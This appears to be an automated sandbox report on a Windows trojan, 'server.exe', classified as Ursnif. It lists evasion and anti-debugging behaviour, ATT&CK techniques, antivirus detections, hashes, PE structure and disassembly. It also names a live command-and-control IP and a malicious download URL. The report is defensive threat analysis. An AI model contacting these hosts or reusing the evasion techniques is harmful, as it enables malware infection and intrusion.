Source: Yara match | File source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR
Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep (graph_0-1468)
Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node (graph_0-1189)
Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node (graph_0-1460)

      Anti Debugging

Source: C:\Users\user\Desktop\server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep (graph_0-1468)
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00540D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0054092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00541C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError

      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR
MITRE ATT&CK Matrix (listed per tactic; the numbers in brackets are the counts shown next to a technique in the matrix)

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (2), Native API (11), At (Linux), At (Windows), Cron
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Privilege Escalation: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (1), Software Packing (21), Obfuscated Files or Information, Binary Padding, Software Packing
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: System Time Discovery (1), Security Software Discovery (1), Virtualization/Sandbox Evasion (1), System Information Discovery (114), Remote System Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (12), Ingress Tool Transfer (1), Protocol Impersonation, Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings
Source | Detection | Scanner | Label
server.exe | 32% | ReversingLabs | Win32.Trojan.Generic
server.exe | 43% | Virustotal |
server.exe | 100% | Joe Sandbox ML |
      No Antivirus matches
Source | Detection | Scanner | Label
0.2.server.exe.680000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
      No Antivirus matches
Source | Detection | Scanner | Label
http://62.173.142.51/ | 2% | Virustotal |
http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2 | 100% | Avira URL Cloud | malware
http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk | 100% | Avira URL Cloud | malware
http://62.173 | 0% | Virustotal |
http://62.173.142.51/ | 100% | Avira URL Cloud | malware
http://62.173 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
checklist.skype.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://62.173.142.51/ | server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmp | false | 2% Virustotal; Avira URL Cloud: malware | unknown
http://62.173 | server.exe, 00000000.00000002.580755093.000000000281C000.00000004.00000010.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | low
http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2 | server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.173.142.51 | unknown | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 826308
Start date and time: 2023-03-14 15:59:46 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: server.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 31.5% (good quality ratio 31.5%)
• Quality average: 89%
• Quality standard deviation: 15.4%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 16
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
62.173.142.51 | KOYCdGz80D.exe | malicious | Ursnif
62.173.142.51 | server.exe | malicious | Ursnif, CryptOne
62.173.142.51 | server.exe | malicious | Ursnif
62.173.142.51 | server.exe | malicious | Ursnif
62.173.142.51 | server.exe | malicious | Ursnif
                  No context
Match: SPACENET-ASInternetServiceProviderRU
Associated Sample Name / URL | Detection | Threat Name | Context
KOYCdGz80D.exe | malicious | Ursnif | 62.173.142.51
server.exe | malicious | Ursnif, CryptOne | 62.173.142.51
server.exe | malicious | Ursnif | 62.173.142.51
server.exe | malicious | Ursnif | 62.173.142.51
server.exe | malicious | Ursnif | 62.173.142.51
server.exe | malicious | Ursnif | 62.173.140.236
server.exe | malicious | Ursnif | 62.173.140.236
server.exe | malicious | Ursnif | 62.173.140.236
server.exe | malicious | Ursnif | 62.173.141.36
server.exe | malicious | Ursnif | 62.173.141.36
lQj2udnlAj.exe | malicious | Ursnif | 62.173.141.36
server.exe | malicious | Ursnif | 62.173.141.36
server.exe | malicious | Ursnif | 62.173.138.6
server.exe | malicious | Ursnif | 62.173.138.6
server.exe | malicious | Ursnif | 62.173.138.6
server.exe | malicious | Ursnif | 62.173.140.103
server.exe | malicious | Ursnif | 62.173.140.103
server.exe | malicious | Ursnif | 62.173.140.103
server.exe | malicious | Ursnif | 62.173.140.103
server.exe | malicious | Ursnif | 62.173.140.103
                  No context
                  No context
                  No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.482937257572218
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: server.exe
File size: 192000
MD5: 8f092511c91bfc1f2516e420739a7967
SHA1: dc67d8f55a6591d16c2709ea65ad143e3a216ec0
SHA256: 9261b47b4fd67523f7afe640e55ccb95ec8b154b5dfa34a8564986ac3e97fe1a
SHA512: 500fa61eec6d02ed95e8a36ffe7160cb1833cd605e3c994d2e1cf09fb7bfd420b1ec3d8f296f863f309fb558afdd77253f5c541dbff1053cc5fbe14df598a154
SSDEEP: 1536:FiqBYFyzXY04aevCQ6V4PLi5jYhsQUFYXxOT6jKBTfjMMTxYjlLmN1j+s8OyWYYE:FfwGezi5jYzTjYMMTxuLmz+scqt7
TLSH: 9A142A0392B07D54F6318A32BE3ECAE9B62FFA514F29776622186E1F05B1071CD62717
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U....j...j...j..~.\..j..~.i..j..~.].Hj....d..j...j..bj..~.X..j..~.m..j..~.j..j..Rich.j..........PE..L....8.b...................
Icon Hash: 70d2eeeacacaeadd
Entrypoint: 0x4030a3
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x62AC38B0 [Fri Jun 17 08:17:52 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 479608e06cc12a8fdc6e43a7370e252b
                  Instruction
                  call 00007F2244AEFFEEh
                  jmp 00007F2244AED78Eh
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov eax, dword ptr [ebp+08h]
                  xor ecx, ecx
                  cmp eax, dword ptr [0040D008h+ecx*8]
                  je 00007F2244AED915h
                  inc ecx
                  cmp ecx, 2Dh
                  jc 00007F2244AED8F3h
                  lea ecx, dword ptr [eax-13h]
                  cmp ecx, 11h
                  jnbe 00007F2244AED910h
                  push 0000000Dh
                  pop eax
                  pop ebp
                  ret
                  mov eax, dword ptr [0040D00Ch+ecx*8]
                  pop ebp
                  ret
                  add eax, FFFFFF44h
                  push 0000000Eh
                  pop ecx
                  cmp ecx, eax
                  sbb eax, eax
                  and eax, ecx
                  add eax, 08h
                  pop ebp
                  ret
                  call 00007F2244AEFC65h
                  test eax, eax
                  jne 00007F2244AED908h
                  mov eax, 0040D170h
                  ret
                  add eax, 08h
                  ret
                  call 00007F2244AEFC52h
                  test eax, eax
                  jne 00007F2244AED908h
                  mov eax, 0040D174h
                  ret
                  add eax, 0Ch
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push esi
                  call 00007F2244AED8E7h
                  mov ecx, dword ptr [ebp+08h]
                  push ecx
                  mov dword ptr [eax], ecx
                  call 00007F2244AED887h
                  pop ecx
                  mov esi, eax
                  call 00007F2244AED8C1h
                  mov dword ptr [eax], esi
                  pop esi
                  pop ebp
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  mov ecx, dword ptr [ebp+08h]
                  test ecx, ecx
                  je 00007F2244AED91Dh
                  push FFFFFFE0h
                  xor edx, edx
                  pop eax
                  div ecx
                  cmp eax, dword ptr [ebp+0Ch]
                  jnc 00007F2244AED911h
                  call 00007F2244AED89Fh
                  mov dword ptr [eax], 0000000Ch
                  xor eax, eax
                  pop ebp
                  ret
                  imul ecx, dword ptr [ebp+0Ch]
                  push esi
                  mov esi, ecx
                  test esi, esi
                  jne 00007F2244AED903h
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb73c | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x10710 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2c20 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1ac | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb0dc | 0xb200 | False | 0.5144838483146067 | data | 6.004854081582009 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xd000 | 0x9058c | 0x13000 | False | 0.9473555715460527 | data | 7.85866639754507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x9e000 | 0x10710 | 0x10800 | False | 0.29835464015151514 | data | 3.787774889182005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0xac948 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
RT_CURSOR | 0xaca90 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
RT_CURSOR | 0xacbc0 | 0xf0 | Device independent bitmap graphic, 24 x 48 x 1, image size 0 | |
RT_CURSOR | 0xaccb0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | |
RT_ICON | 0x9e6d0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0x9e6d0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0x9e6d0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0x9ef78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0x9ef78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0x9ef78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa0048 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Finland
RT_ICON | 0xa0048 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Norway
RT_ICON | 0xa0048 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Sweden
RT_ICON | 0xa0ef0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Finland
RT_ICON | 0xa0ef0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Norway
RT_ICON | 0xa0ef0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Sweden
RT_ICON | 0xa1798 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Finland
RT_ICON | 0xa1798 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Norway
RT_ICON | 0xa1798 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Sweden
RT_ICON | 0xa1e60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Finland
RT_ICON | 0xa1e60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Norway
RT_ICON | 0xa1e60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Sweden
RT_ICON | 0xa23c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Finland
RT_ICON | 0xa23c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Norway
RT_ICON | 0xa23c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Sweden
RT_ICON | 0xa4970 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Finland
RT_ICON | 0xa4970 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Norway
RT_ICON | 0xa4970 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Sweden
RT_ICON | 0xa5a18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Finland
RT_ICON | 0xa5a18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Norway
RT_ICON | 0xa5a18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Sweden
RT_ICON | 0xa63a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Finland
RT_ICON | 0xa63a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Norway
RT_ICON | 0xa63a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Sweden
RT_ICON | 0xa6880 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa6880 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa6880 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa7728 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa7728 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa7728 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa7df0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa7df0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa7df0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xa8358 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xa8358 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xa8358 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xaa900 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xaa900 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xaa900 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xab9a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xab9a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xab9a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Sweden
RT_ICON | 0xac330 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Finland
RT_ICON | 0xac330 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Norway
RT_ICON | 0xac330 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Sweden
RT_STRING | 0xadfe0 | 0x3be | data | Sami Lappish | Finland
RT_STRING | 0xadfe0 | 0x3be | data | Sami Lappish | Norway
RT_STRING | 0xadfe0 | 0x3be | data | Sami Lappish | Sweden
RT_STRING | 0xae3a0 | 0x36a | data | Sami Lappish | Finland
RT_STRING | 0xae3a0 | 0x36a | data | Sami Lappish | Norway
RT_STRING | 0xae3a0 | 0x36a | data | Sami Lappish | Sweden
RT_ACCELERATOR | 0xac8a8 | 0x90 | data | Sami Lappish | Finland
RT_ACCELERATOR | 0xac8a8 | 0x90 | data | Sami Lappish | Norway
RT_ACCELERATOR | 0xac8a8 | 0x90 | data | Sami Lappish | Sweden
RT_ACCELERATOR | 0xac800 | 0xa8 | data | Sami Lappish | Finland
RT_ACCELERATOR | 0xac800 | 0xa8 | data | Sami Lappish | Norway
RT_ACCELERATOR | 0xac800 | 0xa8 | data | Sami Lappish | Sweden
RT_GROUP_CURSOR | 0xaca78 | 0x14 | data | |
RT_GROUP_CURSOR | 0xadd58 | 0x30 | data | |
RT_GROUP_ICON | 0xa0020 | 0x22 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xa0020 | 0x22 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xa0020 | 0x22 | data | Sami Lappish | Sweden
RT_GROUP_ICON | 0xa6808 | 0x76 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xa6808 | 0x76 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xa6808 | 0x76 | data | Sami Lappish | Sweden
RT_GROUP_ICON | 0xac798 | 0x68 | data | Sami Lappish | Finland
RT_GROUP_ICON | 0xac798 | 0x68 | data | Sami Lappish | Norway
RT_GROUP_ICON | 0xac798 | 0x68 | data | Sami Lappish | Sweden
RT_VERSION | 0xadd88 | 0x254 | data | |
None | 0xac938 | 0xa | data | Sami Lappish | Finland
None | 0xac938 | 0xa | data | Sami Lappish | Norway
None | 0xac938 | 0xa | data | Sami Lappish | Sweden
DLL | Import
KERNEL32.dll | lstrcmpA, FindFirstFileW, EnumCalendarInfoA, _llseek, WritePrivateProfileSectionA, GlobalLock, InterlockedCompareExchange, SleepEx, GetModuleHandleW, EnumCalendarInfoExW, EnumTimeFormatsW, WriteFileGather, EnumResourceTypesA, GlobalAlloc, GetSystemDirectoryW, AddRefActCtx, GetSystemWindowsDirectoryA, LeaveCriticalSection, GetConsoleAliasW, GetFileAttributesW, SetDefaultCommConfigA, GetCPInfoExW, SetLastError, GetProcAddress, CopyFileA, GetFirmwareEnvironmentVariableW, LoadLibraryA, OpenWaitableTimerW, FindFirstVolumeMountPointW, GetExitCodeThread, AddAtomW, CreateEventW, AddAtomA, FindNextFileW, GetShortPathNameW, SetCalendarInfoA, ReadConsoleInputW, LocalSize, CopyFileExA, RaiseException, PulseEvent, GetLastError, MoveFileA, DeleteFileA, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapAlloc, EnterCriticalSection, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapCreate, HeapFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, LoadLibraryW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, IsProcessorFeaturePresent, HeapSize, CloseHandle, WriteConsoleW, 